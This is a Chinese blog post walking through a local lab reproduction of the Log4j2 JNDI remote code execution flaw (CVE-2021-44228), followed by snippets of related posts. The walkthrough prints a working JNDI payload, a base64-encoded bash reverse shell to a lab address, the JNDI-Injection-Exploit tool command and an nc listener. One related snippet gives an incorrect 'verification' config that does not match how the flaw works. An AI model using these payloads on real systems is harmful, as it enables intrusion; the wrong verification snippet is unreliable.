漏洞复现——log4j2-rce(CVE-2021-44228)

已于 2022-05-29 09:25:02 修改
阅读量1.9k 收藏 6
点赞数 1
分类专栏: 漏洞复现 burpsuite log4j2-rce 文章标签: apache 安全 linux
于 2022-05-29 09:06:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42773448/article/details/125026565
版权

一、漏洞介绍

漏洞名称:Apache Log4j2远程代码执行漏洞

组件名称:Apache Log4j2

截止2021年1210,受影响的Apache log4j2版本:

2.0≤Apache Log4j<=2.15.0-rc1

漏洞类型:远程代码执行

二、漏洞复现

实验环境:本地vulfocus靶场

使用工具:burpsuite、ceye平台、JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

打开本地vulfocus靶场,启动漏洞环境

因为咱们本地IP为192.168.3.3,所以访问http://192.168.3.3:33351

ceye.io验证

通过ceye平台获取到域名xxx.ceye.io,构造payload:${jndi:ldap://xxx.ceye.io},浏览器点击?????并使用Burpsuite抓包,替换payload参数,此时发包会导致服务器400错误

 通过burpsuite自带的编码工具对payload参数就行URL编码

 编码后再次发送请求包

 在ceye平台成功获取到解析记录

利用JNDI注入反弹shell 

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用

jar包地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

使用方式

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

反弹shell指令

bash -i >& /dev/tcp/ip/port 0>&1

此处的ip为192.168.3.3,port可使用任意未被占用的端口,此处指定为5555

即bash -i >& /dev/tcp/192.168.3.3/5555 0>&1

对其进行base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMy81NTU1IDA+JjE=

代入JNDI工具后执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMy81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.3.3

另起窗口监听5555端口

nc -l 0.0.0.0 5555

替换工具生成的payload:rmi://192.168.3.3:1099/nu2hjc 到Burpsuite:

 ​​​

编码后发送到靶机

监听窗口成功接收到反弹shell

漏洞复现完毕。 

小林话安全
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
漏洞复现Apache log4j RCE 远程代码执行漏洞(CVE-2021-44228)
qq_45244158的博客
12-14 5520
Log4j任意代码执行RCECVE-2021-44228)前言一、漏洞描述二、受影响的版本三、复现过程1.从Vulfocus靶场获取测试环境2.攻击过程四、修复建议1.升级到最新版本2.缓解措施3.流量查询 前言 2021年11月24日,阿里云安全团队正式向Apache报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2的部分功能具有递归分析功能,攻击者可以直接构造恶意请求触发远程代码执行漏洞。 一、漏洞描述 Apache Log4j2 是一个基于 Java 的日志工具。这
CVE-2021-44228 Log4j2漏洞复现
Cover-3321的博客
01-07 1845
apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。
CVE-2021-44228漏洞复现
最新发布
m0_65764670的博客
05-29 1178
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
Log4j2CVE-2021-44228漏洞复现
oiadkt的博客
04-10 484
Log4j2CVE-2021-44228漏洞复现
CVE-2021-44228log4j2漏洞复现
fainpo的博客
05-07 280
漏洞适用版本:2.0 <= Apache log4j2 <= 2.14.1。
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 624
Apache log4j2RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
logging-log4j2-log4j-2.16.0-rc1.zip
12-13
2021年12月初,Log4j中的一个名为CVE-2021-44228的严重漏洞被公开,这被称为"Log4Shell"漏洞。它源于Log4j的JNDI(Java Naming and Directory Interface)查找功能,当恶意用户在日志记录中插入特定的字符串时,...
apache-log4j-2.16.0-bin.rar
12-17
然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228,这个漏洞允许攻击者通过在日志记录中注入恶意代码,实现远程代码执行(RCE),对受影响的系统造成严重威胁。 该漏洞源于Log4j2的一个...
log4j-2.15.0-rc2.zip
12-10
Log4Shell,又称为CVE-2021-44228,是一个极其严重的远程代码执行(RCE漏洞,影响了Log4j 2.x版本。这个漏洞允许攻击者通过精心构造的JNDI(Java Naming and Directory Interface)链接来注入恶意代码,进而执行...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
框架、组件漏洞系列3:log4j2-Rce漏洞复现
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-11 2252
前言: 漏洞复现环境来自于掌控者安全,在此深表感谢!!! 复现环境在“掌控者安全”,有兴趣的朋友可以去复现一下。上图略微有颜色,不过毕竟挖洞太乏味,需要让生活精彩嘛,介意请撤退。。 漏洞简介: Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Ap.
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 5280
Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
【vulhub漏洞复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞
RexHa的博客
03-01 2270
一、漏洞详情Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。JNDI注入漏洞JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1405
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Log4j2-rce-学习
feng的博客
03-04 725
Log4j2-rce-学习 前言 当时漏洞出的时候在准备期末考试就没管,现在重新拾起来。。 exp package com.summer.test; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.LogManager; public class Test { private static final Logger log = LogManager.getLogger(); public st
Log4j2漏洞复现
热门推荐
weixin_51519028的博客
08-12 1万+
Apache Log4j2Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6325
漏洞说明 Log4j是Apache的开源日志记录组件。Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值